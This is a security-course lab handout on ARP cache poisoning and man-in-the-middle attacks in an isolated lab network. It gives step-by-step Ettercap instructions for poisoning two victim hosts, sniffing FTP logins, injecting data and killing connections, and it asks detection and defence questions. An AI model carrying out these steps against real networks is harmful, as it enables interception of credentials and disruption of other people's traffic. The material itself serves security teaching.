Spoofing and Man-in-the-Middle Attacks
Date Assigned: mm/dd/yyyy
Time Due: mm/dd/yyyy by hh:mm
Educational Objectives
This lab will introduce you to both ARP spoofing and man-in-the-middle attacks and how they
are carried out within a networked environment.
Lab Environment
The following machines are needed to conduct this lab:

CentOS Linux, CentOS6.4

Backtrack 5, BT5R3

Windows 7, Win7

Fedora 18, FC18
All computers must be networked and accessible to each other.
Summary
When you connect to a computer you often take for granted the protocols used to find the
destination machine. In a LAN the method of resolving an IP address to a MAC to send a packet
to its destination is by ARP (Address Resolution Protocol).
In this lab you will learn how to poison victims ARP cache and passively sniff connections.
Before software can be used to poison an ARP cache you must first do some preliminary
exercises to better understand how to use and manipulate your ARP cache. Once you understand
ARP and how your ARP cache is utilized, the next few exercises use ARP poison to sniff and
attack connections. The first exercise is to understand a powerful tool used to perform ARP
poison and various LAN attacks. This tool is Ettercap. Next you will be passively and actively
sniffing a connection between two victim machines. After completing these exercises you will
have a good understanding of how man-in-the-middle attacks occur.
Background
What is ARP?
Address Resolution Protocol (ARP) is a protocol for mapping an Internet Protocol address (IP
address) to a physical machine address that is recognized in the local network. For example, in IP
Version 4, the most common level of IP in use today, an address is 32 bits long. In an Ethernet
local area network, however, addresses for attached devices are 48 bits long. (The physical
machine address is also known as a Media Access Control or MAC address.) A table, usually
1|Page
called the ARP cache, is used to maintain a correlation between each MAC address and its
corresponding IP address. ARP provides the protocol rules for making this correlation and
providing address conversion in both directions.
How ARP Works?
When an incoming packet destined for a host machine on a particular local area network arrives
at a gateway, the gateway asks the ARP program to find a physical host or MAC address that
matches the IP address. The ARP program looks in the ARP cache and, if it finds the address,
provides it so that the packet can be converted to the right packet length and format and sent to
the machine. If no entry is found for the IP address, ARP broadcasts a request packet in a special
format to all the machines on the LAN to see if one machine knows that it has that IP address
associated with it. A machine that recognizes the IP address as its own returns a reply indicating
so. The ARP program updates the ARP cache for future reference and then sends the packet to
the MAC address that replied. Since protocol details differ for each type of local area network,
there are separate ARP Requests for Comments (RFC) for Ethernet, ATM, Fiber DistributedData Interface, and other protocols. There is a Reverse ARP (RARP) for host machines that don't
know their IP address. RARP enables them to request their IP address from the gateway's ARP
cache.
What is ARP poison and a man in the middle attack?
The Address Resolution Protocol serves the function of determining the mapping between IP
addresses and MAC hardware addresses on local networks. For example, a host that wants to
send a message to IP address 10.0.0.2 on the local network sends a broadcast ARP packet that
requests the MAC for that IP. The host that owns the IP 10.0.0.2 returns an ARP reply packet
with its MAC address. The requesting host then sends the message, and stores the IP-to-MAC
mapping for future packets.
In order to minimize network traffic, ARP implementations update their cache of ARP-to-IP
mappings whenever an ARP request or reply is received. If the MAC address reported in the
packet for the given IP has changed, the new value will overwrite the old one in the cache. ARP
replies are unicast packets directed at one machine, and cause only that machine to update its
cache.
Figure 1. Setting up a man in the middle attack by C against A and B.
2|Page
The particular kind of ARP attack examined in this lab is the use of ARP reply packets to
perform cache poisoning. This attack makes possible many sorts of man-in-the-middle attacks.
Consider an example depicted in Figure 1. The attacker, Host C, sends an ARP reply to B stating
that A’s IP maps to C’s MAC address, and another ARP reply to A stating that B’s IP maps to
C’s MAC address. Since ARP is a stateless protocol, hosts A and B assume that they sent an
ARP request at some point in the past and update their ARP caches with this new information.
Figure 2. Computer C performs a man in the middle attack against A and B.
Now, when A tries to send a packet to B it will go to C instead. Host C can use this unique
position to forward the packets on to the correct host and monitor or modify them as they pass
through C (Figure 2). This man in the middle attack allows C to monitor or modify telnet
sessions, read mail passing over Post Office Protocol (POP) or SMTP, intercept SSH
negotiations, monitor and display Web usage, and commit many other malicious activities.
The ARP cache poisoning attack can be used against all machines in the same broadcast domain
as the attacker. Hence, it works over hubs, bridges, and switches, but not across routers. An
attacker can, in fact, poison the ARP cache of the router itself, but the router won't pass the ARP
packets along to its other links. Switches with port security features that bind MAC addresses to
individual ports do not prevent this attack since no MAC addresses are actually changed. The
attack occurs at a higher network layer, the IP layer, which the switch does not monitor.
The tool that was used in demonstrating and testing the effectiveness of these attacks was
Ettercap. Developed as an open source project, Ettercap provides both a menu based and
command line tool to perform ARP cache poisoning and man in the middle attacks against
switched networks (among other things).
What is Ettercap?
(http://Ettercap.sourceforge.net/)
3|Page
Ettercap is a multi-functional packet sniffer/interceptor/logger that works on switched LANs. It
allows the active and passive dissection of numerous protocols, including ciphered ones, such as
SSH1, and includes features for network and host analysis.
Section 0: Setup and installation
0.1: Installing Ettercap
Ettercap should be installed on your BT5R3 machine – however you can place it on another
machine such as FC18 is you wish:
# yum install ettercap
# yum install ettercap-common
# yum install ettercap-gtk
Test Ettercap
# ettercap -v
If your installation completed successfully, you will be able to see “Ettercap NG-0.7.3”.
0.2: Checking the FTP servers
Now you have to make sure that you have a FTP server installed and running on your
CENTOS6.4 machine.
# yum search ftpd
# yum install vsftpd
Start ftp:
# /etc/init.d/vsftpd start
Test this using 127.0.0.1
0.3: Telnet Server 7
Make sure the TELNET server is installed on your Windows 7 machine, and is running:
Start Telnet service
C:\> tlntsvr.exe /service
Note: If Telnet service is not installed please install using the following steps
Control Panel -> Programs and Features -> Turn Windows features on or off -> Telnet
Server
4|Page
0.4: Telnet Server CENTOS6.4
Make sure the TELNET server is installed on your CENTOS6.4 machine, and is running:
#yum search telnet
#yum install telnet_server telnet
#/etc/init.d/xinetd start
0.5: Wireshark CENTOS6.4 and BT5R3
Check to make certain that both Operating Systems have Wireshark installed.
# yum install wireshark-gnome
Section 1: ARP
By now you should have a clear understanding of what ARP is and how it works. Now you will
get a chance to learn more about this protocol and how to hack it, by doing some exercises. In
the first exercise you will learn how to read your own ARP cache in Linux (Windows is very
similar) and how to modify it. After learning the basic OS commands to control your ARP cache,
you will use the program Ettercap to poison other computer’s caches on the network.
Before doing the lab it is important to understand which machine is being used in each situation.
Each of the machines hardware addresses will be identified by the following notation
a:b:c:d:e:f. Make sure you substitute the appropriate hardware address when you see the
notation a:b:c:d:e:f.
1.1 Getting to Know ARP and ARP Tables
1) First you are going to observe the initial state of your ARP cache.
Open up a terminal in you CENTOS6.4 machine
# arp
If the entry is blank, then think about when exactly does a computer start sending out ARP
packets to discover hosts on the network.
2) Now you are going to observe as entries are added to the ARP cache.
On the CENTOS6.4 machine:
 First start the program Wireshark to capture ARP packets.
 Make certain that Wireshark will stop the capture after 30 packets and then capture.
 Next you are going to ping the BT5R3 machine from the terminal
 If the Wireshark program did not already stop capturing packets then click on < stop >
5|Page




Review the captured ARP packets in Wireshark
Next check the ARP cache in the CENTOS6.4 machine
Next you are going to ping the Win7 machine
Next check the ARP cache in the CENTOS6.4 machine
Q1.1.1: What did you see after typing “ARP”? Why is this?
3) Finally before you move on to the next part of the lab, make a table of each machine’s IP
address and its corresponding hardware address.
Table 1. IP addresses and hardware addresses
Computer
IP Address
Hardware Address
BT5R3
CENTOS6.4
Windows 7
4) In addition to just observing the ARP cache, the ARP cache can be manipulated with the
“ARP” command. The ARP command also allows the user to manually enter in IP to hardware
address mappings.
Although on a large network this would require a lot of labor, it is an easy way for networks with
static IP addresses to defeat ARP poison attempts by hackers. By adding the ARP entry
manually, it becomes static and cannot be changed except by the owner of the computer. Let’s
work with some of these other commands now.
On the CENTOS6.4 machine:
Use the “ARP” help feature and look through the possible options.
# yum install man
# man arp
Next edit the cache manually by deleting the BT5R3 entry
Q.1.1.2: What command did you use to delete the entry?
Make certain to verify the new ARP cache
Next edit the cache manually be adding back the deleted BT5R3 computer so that its address is
static
6|Page
Q.1.1.3: What command did you use to manually add the entry?
Make certain to verify the ARP cache again
The static entry should be identified by the flag ‘CM’
Q1.1.4: What is the significance of ‘CM’? Make certain that you provide a detailed
response.
Finally remove the static entry
1.2. Using ARP
1) Now you are going to test to see what happens when an IP address is mapped to the
wrong hardware address. Before you use an ARP poison program to do this, you are
going to do this manually.
2) In the following commands below, make sure to set the hardware address for the BT5R3
to the wrong address.
3) Make certain to verify the ARP cache again
Cd
The static entry should be identified by the flag ‘CM’
4) When completed, try to ping the BT5R3 machine from CENTOS6.4
Q1.2.1 What happened when the machine was pinged? Why did this happen?
Section 2: Ettercap
2.1. Creating FTP Access
1) For the next few exercises you are going to use the BT5R3 machine as the attacking machine
and the Win7 machine and CENTOS6.4 machine to communicate with each other using various
ports. These machines will be the unknowing victims within the network.
1. Make certain that you create an account that can be used to access CENTOS6.4’s FTP
server.
2. Write the username and password for this account below:
Table 2. Created FTP Account for RHEL5 Machine
Computer
RHEL5
7|Page
Username
Password
3. Also on CENTOS6.4, create a simple text file named no_protection.txt within the
/var/ftp/pub directory. This file will be used to transfer from CENTOS6.4 to Win7 via
FTP.
# cd /var/ftp/pub
# echo [YOURMTUUSERID] > no_protection.txt
2.2. Getting to Know Ettercap
When Ettercap is started, it first probes the network to see all of the hosts that are on the
network. It does this by sending out ARP request packets for each host IP address on the network
(network determined by net mask of the host). Only the IP addresses that have hosts on them will
reply giving the attacker a good indication of who is on the network. Why does this work so
well? Because each host on the network must have ARP enabled so that the network will work
properly.
Although Ettercap is best used by command-line, for this introductory use, we will use the
program’s GUI interface.
Start Ettercap 0.7.3 on your BT5R3 machine, type
#ettercap -G
at a command prompt window. You should see the following screen:
Figure 3 Ettercap GUI
8|Page
Let’s see how Ettercap scans your addresses.
On your CENTOS6.4 machine:
Open Wireshark
Start capture
On your BT5R3 machine using the Ettercap application:
Note: Do not scan the entire network!!!
Conduct a quick scan (i.e. set the net mask to 255.255.255.0.) to only scan class C range:

Select Options

Netmask

Type 255.255.255.0
Or place your hosts on file → save → browse to file when selecting host list
1. Select Sniff - Unified Sniffing using the Ethernet port that is assigned to your BT5R3
machine (i.e. eth0)
2. Then Hosts - Scan for hosts (**is using subnet to scan and not host file)
3. Once Ettercap is done scanning stop the Wireshark packet capture
4. Make certain to notice how Wireshark views the Ettercap scan.
Q.2.2.1: How could you use software to detect that Ettercap is being run on your network?
Remember to give a detailed response.
2.3. Using Ettercap Passively to Sniff a Connection
Now you are going to use the skills you learned in the previous section to perform a man in the
middle attack on a connection. For this scenario a user on the Win7 machine will attempt to login
to the ftp server on the CENTOS6.4 machine. Unknown to the victim, the attacker on the BT5R3
machine will be in the middle of the connection watching and logging the actions of the
victim(s).
First you must use Ettercap to select the victim machines and ARP poison them.








On the BT5R3 Ettercap GUI:
Check the host list and select RHEL 5 and Win7 as the two targets
Hosts – Host list
Select CENTOS6.4 IP – Add to Target 1
Select Win7 IP – Add to Target 2
Select Start->Start Sniffing
Conduct the man-in-the-middle by selecting Mitm->ARP poisoning – Sniff remote
connections
Once this is complete select View->Connections
9|Page
Now that the ARP poison has taken place between the two targets, conduct the following:
On the Win7 machine:
 Open a terminal if one isn’t already open
 Show its ARP cache
On the CENTOS6.4 machine:
 Open a terminal if one isn’t already open
 Show its ARP cache
Q.2.3.1: What did you see different about the ARP cache on the two virtual machines
compared to before?
2.4. Displaying Ettercap’s Abilities to Conduct Man-in-the-Middle Attack
To illustrate how Ettercap can conduct a man-in-the-middle attack, you will be logging into
RHEL’s FTP server from Win7.
Before this takes place, make certain that you start another Wireshark session on the BT5R3
machine to help you clearly see all of the packets involved in the attack.
On the BT5R3 machine:
 Open Wireshark if it is already not open
 Set capture for 300 packets
 Start the packet capture
On the Win7 machine:
 In the terminal ftp into the CENTOS6.4 machine
 At the prompt enter the user name and then password for the user created earlier
 Type in a few commands to create data to see
 Also before you exit download the new text file of (no_protection.txt) to the Win7
machine
On the BT5R3 machine:
 Stop Wireshark capture if it has not stopped already
 Open up Wireshark and look at the packets from the ftp session
 By looking at the IP address it seems as though the connection is going from the original
source to the original destination
 On one of these same packets open up the Ethernet part and look at the hardware
addresses
 Make certain to view an ftp packet and its source and destination hardware address
Q2.4.1: What did you notice about the packets hardware address compared to its IP
address? How would software looking to detect this attack fail?
10 | P a g e
Q2.4.2: Were you able to get the userid and password using Ettercap?
2.5. Using Ettercap Actively to Disrupt a Connection
Ettercap also has a wide variety of methods to disrupt a connection. Using the existing FTP
connection that has been established between the Win7 and CENTOS6.4 machine, attempt to
inject data or a file into this connection on either or both victim computers.
Q.2.5.1: Were you successful? Why or why not?
Now go ahead and “kill” the FTP connection between the victim’s machines. Once completed,
you should be able to view that the connection was broken from the Win7 machine that
established the FTP connection to the CENTOS6.4 machine.
Q.2.5.2: How would you proceed to avoid an attacker from being able to shut down
computer connections such as FTP between CENTOS6.4 and Win7? Make certain to be
specific in order to demonstrate your knowledge on this topic.
Optional ~ Section 3: Create your own MiTM (3 Bonus Points)
There is more than one way to use Ettercap along with other programs to implement a MiTM
attack(ie. Hunt). You are encouraged to try other types of MiTM attacks and programs and then
write up a small summary of what you did along with how you would protect against this attack.
Also include screenshots validating MiTM attack.
Section 4: General Questions
Q4.1. Any corrections or general comments about this lab?
Q4.2. How long did it take you to complete this lab?
Q4.3. On a scale of 1-10 (with 1 being easy and 10 being difficult) how would you rate this
lab?
11 | P a g e
Answer Sheet
Q.1.1.1: What did you see after typing “ARP”? Why is this?
Q.1.1.2: What command did you use to delete the entry?
Q.1.1.3: What command did you use to manually add the entry?
Q.1.1.4: What is the significance of ‘CM’? Make certain that you provide a detailed
response.
Q1.2.1 What happened when the machine was pinged? Why did this happen?
Q.2.2.1: How could you use software to detect that Ettercap is being run on your network?
Remember to give a detailed response.
Q.2.3.1: What did you see different about the ARP cache on the two virtual machines
compared to before? Make certain to explain your answer to demonstrate your knowledge
on this topic.
Q2.4.1: What did you notice about the packets hardware address compared to its IP
address? How would software looking to detect this attack fail?
Q2.4.2: Were you able to get the userid and password on the BT5R3 machine using
Ettercap?
Q.2.5.1: Were you successful? Why or why not?
Q.2.5.2: How would you proceed to avoid an attacker from being able to shut down
computer connections such as FTP between CENTOS6.4 and Win7? Make certain to be
specific in order to demonstrate your knowledge on this topic.
12 | P a g e